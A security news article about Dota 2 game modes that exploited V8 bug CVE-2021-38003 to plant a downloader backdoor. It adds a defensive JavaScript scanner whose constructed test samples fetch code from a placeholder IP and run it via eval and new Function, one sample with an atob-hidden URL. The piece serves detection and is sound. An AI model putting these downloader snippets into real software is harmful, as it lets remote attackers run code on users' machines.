An unknown attacker is believed to have created malicious game modes for the Dota 2 multiplayer online battle arena (MOBA) video game and used them to establish backdoor access to players' systems.
The game modes exploit a high-severity flaw in the V8 JavaScript engine tracked as CVE-2021-38003 (CVSS score: 8.8), which was exploited as a zero-day and was addressed by Google in October 2021.
"Because V8 was not sandboxed in Dota, the exploit on its own allowed remote code execution against other Dota players," said Avast researcher Jan Vojtěšek in a report published last week.
Following responsible disclosure to game publisher Valve, fixes were shipped on January 12, 2023, by upgrading the V8 version bundled with the game.
A game mode is essentially a custom add-on that can extend an existing title or offer entirely new gameplay that deviates from the standard rules.
Publishing a custom game mode to the Steam store involves a review process by Valve, but the malicious game modes discovered by the antivirus vendor managed to slip through the cracks.
The game modes, which have since been removed, are 'test addon plz ignore', 'Overdog no annoying heroes', 'Custom Hero Brawl', and 'Overthrow RTZ Edition X10 XP'. The threat actor is also said to have published a fifth game mode, 'Brawl in Petah Tiqwa', which does not contain malicious code.
Embedded within 'test addon plz ignore' is an exploit for the V8 flaw that can be weaponized to execute custom shellcode.
The other three take a more covert approach: the malicious code is designed to contact a remote server, fetch a JavaScript payload, and execute it, which turns the game mode into a downloader for whatever the attacker chose to serve. That server is no longer reachable.
In a hypothetical attack scenario, a player who launched one of the above game modes could be targeted by the attacker to gain remote access to the host and deploy additional malware for further exploitation.
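The downloader pattern described above (fetch code from a remote server, then evaluate it at runtime) is something a reviewer of custom game-mode scripts can look for statically. The following is an added example, not code from the Avast report or from Valve: a small heuristic scanner that flags JavaScript which combines a remote fetch with a dynamic-evaluation sink, and separately notes common string obfuscation. The sample scripts are constructed for this example, and the `$.Msg` / `$.AsyncWebRequest` calls are assumed Panorama UI helper names used only as illustration.

```javascript
// Added example (not Avast's or Valve's code): heuristic scanner for the
// "remote fetch + dynamic eval" downloader backdoor in game-mode JavaScript.

// Sinks that turn a string into executable code.
const DYNAMIC_EVAL = [
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /\bFunction\s*\(\s*["'`]/,
  /\bset(?:Timeout|Interval)\s*\(\s*["'`]/,
];

// Sources that pull data in from outside the add-on.
const REMOTE_FETCH = [
  /\bfetch\s*\(/,
  /\bXMLHttpRequest\b/,
  /\$\.AsyncWebRequest\s*\(/, // assumed Panorama request helper name
  /https?:\/\/[^\s"'`)]+/,
];

// Indicators that strings are being hidden from casual review.
const OBFUSCATION = [
  /\batob\s*\(/,
  /String\.fromCharCode\s*\(/,
  /(?:\\x[0-9a-fA-F]{2}){4,}/,
];

const CATEGORIES = {
  'dynamic-eval': DYNAMIC_EVAL,
  'remote-fetch': REMOTE_FETCH,
  obfuscation: OBFUSCATION,
};

// Scan one script; returns { name, risk, findings } where risk is
// 'downloader' (fetch + eval both present), 'review' (any single
// indicator) or 'none'.
function scanScript(name, source) {
  const findings = [];
  source.split(/\r?\n/).forEach((line, idx) => {
    for (const [kind, patterns] of Object.entries(CATEGORIES)) {
      if (patterns.some((re) => re.test(line))) {
        findings.push({ line: idx + 1, kind, text: line.trim() });
      }
    }
  });
  const kinds = new Set(findings.map((f) => f.kind));
  let risk = 'none';
  if (kinds.has('dynamic-eval') && kinds.has('remote-fetch')) risk = 'downloader';
  else if (kinds.size > 0) risk = 'review';
  return { name, risk, findings };
}

// Constructed sample scripts for this example.
const SAMPLES = {
  // Ordinary UI logic: no network access, no dynamic code.
  benign: `
    function OnHeroPicked(heroName) {
      $.Msg("picked " + heroName);
      return heroName.toUpperCase();
    }`,
  // Downloader backdoor: fetch a script from a remote host and eval it.
  backdoor: `
    function RefreshLeaderboard() {
      var req = new XMLHttpRequest();
      req.open("GET", "http://203.0.113.7/leaderboard.js");
      req.onload = function () { eval(req.responseText); };
      req.send();
    }`,
  // Same behaviour with the URL hidden behind atob() and a Function sink.
  obfuscated: `
    var u = atob("aHR0cDovLzIwMy4wLjExMy43L2xiLmpz");
    fetch(u).then(r => r.text()).then(t => new Function(t)());`,
};

for (const [name, src] of Object.entries(SAMPLES)) {
  const r = scanScript(name, src);
  console.log(
    `${name}: ${r.risk}` +
      r.findings.map((f) => `\n  line ${f.line} [${f.kind}] ${f.text}`).join('')
  );
}
```

This is a triage aid, not a verdict: a legitimate mode that pulls JSON from a web service will trip the remote-fetch rule, and an exploit like the one in 'test addon plz ignore' needs no network call at all, so it would only surface here if it also used a dynamic-eval sink. The durable fix is the one Valve shipped, running a patched V8, plus review that treats any `eval`-style sink in a game mode as a reason to reject it.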
It's not immediately clear what the ultimate goal of the developer behind the game modes was, but Avast points out that it was unlikely to have been benign research.
"First, the attacker didn't report the vulnerability to Valve (which would generally be considered a nice thing to do)," Vojtěšek said. "Second, the attacker tried to hide the exploit behind a secret backdoor."
"It's also possible that the attacker wasn't purely malicious either, since such an attacker could have exploited this vulnerability to much greater effect."